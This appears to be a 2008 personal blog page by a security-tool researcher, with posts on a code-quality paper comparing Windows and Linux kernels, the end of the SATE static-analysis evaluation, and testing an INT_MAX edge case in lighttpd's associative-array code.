I just want to quote a part of the conclusion by the author
Therefore, the most we can read from the overall balance of marks is that open source development approaches do not produce software of markedly higher quality than proprietary software development.
The only problem with this statement is that it is based on the fact that the metrics he used were not weighted for their importance for the "Code Quality" (if this means something). Therefore, the comparison between the Windows research kernel and Linux seems a little bit awkward to me. Anyway, this is a very interesting paper about code quality, and lots of interesting ideas from the author of CScout.
Romain | Wednesday, May 14 2008 - 00:20 UTC | Discussion
Yeah, that's sad and also a relief: SATE is over. We actually released today the last stage of the evaluation (basically, the evaluation with some correction based on comments from the participants). Even though I would have prefer to have more feedback from participants on our evaluation, especially to increase its quality, I still think SATE is a good thing and will be an interesting resource for lost of researchers. This is, as far as I know, the only exhaustive resource on the subject (wild source code + weaknesses).
What do I want to do, see next? Since we have accumulated lots of data with the tool reports (raw weaknesses), the evaluations (I really want to thank MITRE's guys, especially Steve Christey and Bob Schmeichel for their help), I'm looking forward to do data analysis and trying to extract some limited results on it.
Anyway, this was overall a good experience, I actually did my first real code review mostly on lighttpd, dspace, mvnform and naim, I think I know way more on how detecting vulnerabilities, I also have been asking myself about how to rate vulnerabilities such as Cross-Site Scripting (hopefully, I will release the little document I wrote about it), I learned so much about how people are writing code trying to understand the design, the code etc. in the applications.
Also, hopefully, I will be able to release the website I developed to handle the weaknesses from different tools. It is, I think, interesting if you are working with more than one assessor. You can send evaluation, comments, merging the weaknesses etc. with a web interface. Even though it needs improvements (it has been done in less than 2 weeks) I think this would be an interesting piece of software for people who are dealing with tons of weaknesses. Another interesting point is that we (at NIST) may open that website for everybody in order to make new evaluation in order to increase the quality of the data we currently have.
Oh well, it seems like a journey is really close to its end, it was such a good time sometimes, and some other time such consuming work. We've been dealing with fifty thousands of weaknesses, dozen of tool reports, and almost tens of test cases... I will keep you posted about the next decision we are gonna make with SATE and hope that lots of people will find in this "exposition" the most they could get.
Romain | Saturday, May 10 2008 - 11:30 UTC | Discussion
Yesterday, I came across a case in a piece of software which was really hard for me to understand perfectly. Not only the code is well written (which is always worse for finding bugs :)) but the structure is also well thought (this is the implementation of an associated array in C in the lighttpd application).
The problem I had was to state whether a tool report was a true-positive/false-positive. So, as in many case I've seen in this software a problem may occur only in the limit cases. This one may occur after INT_MAX insertion in the structure. I don't know if one of you ever tried to do such a thing, but only INT_MAX (~2 billions on typical PC) allocations is a lot, so inserting elements in a structure that needs at least 5 (re)allocations is too much. But well, I did it. Also, I ran this test with valgrind using the memory leak check (full check and high definition).
I then ran a simple test program to fill this structure in a real condition: a typical x86/32-bit architecture. As I knew it was stupid and didn't even think this could end before 2 days I started looking in other direction in order to reduce the INT_MAX size for having a reasonable time execution of the test.
My first attempt is to shift all the types that are used, I knew this was not perfect because even if I can force my program to use unsigned short instead of size_t, I wouldn't change the size of the pointers, a char * would still b 32-bit (there may be some options in gcc to control the size of the pointers — which I doubt — but I didn't find any).
Using this methodology, I was able to make the program crash in the way that would have been a real true-positive.
But as I knew it was not good since the size of the pointers are not modified and I had the feeling that in that particular structure, the case of the possible crash is handled by itself (due to pointer and type limits), I started looking in other direction for running that program in 16-bit, a pseudo-real-16-bit-mode. I then started looking into emulators and how to compile code for 16-bits and running it on my linux (x86/32-bit). After having issues compiling and running the test program with the gnu-m68hc11 ELF package, I found the bcc/elksemu stuff. After compiling and running with ELKS utilities, the test program didn't crash, it only failed in an assertion test after an allocation...
Different behavior, with different methods, okay... which is the correct one? Is it a problem of pointer size that made the test running differently than the real program on a 32-bit or maybe a limitation of the elksemu machine? As this morning I checked the state of the 32-bit run I launched yesterday, and this was finished... ended by a failed assertion.
As expected, pointer size matters when you wanna test on intrinsic limitations of a structure and its behavior using limit cases.
I've just came across this interesting blog entry; some numbers on how people (large websites companies) are actually using MySQL.
http://venublog.com/2008/04/16/notes-from-scaling-mysql-up-or-out/
« previous entries - page 1 of 5
Last comments